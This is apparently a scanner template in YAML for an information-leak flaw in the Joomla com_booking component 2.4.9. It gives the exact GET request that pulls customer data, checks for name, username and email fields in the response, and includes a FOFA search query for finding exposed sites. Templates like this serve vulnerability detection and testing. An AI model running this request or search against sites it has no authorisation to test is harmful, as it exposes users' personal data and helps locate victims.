product: Joomla
vName: Joomla com_booking component 2.4.9 - Information Leak
type: 信息泄露
vID: [ ]
level: 3
vDesc: Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.
version: ''
note: ''
search:
  FOFA: inurl:"index.php?option=com_booking"
protocol: http
link: https://www.exploit-db.com/exploits/51595
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      path: /index.php?option=com_booking&controller=customer&task=getUserData&id=123
      method: get
    verify:
      logic: and
      check:
        - body:
            value:
              - '"name":'
              - '"username":'
              - '"email":'
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200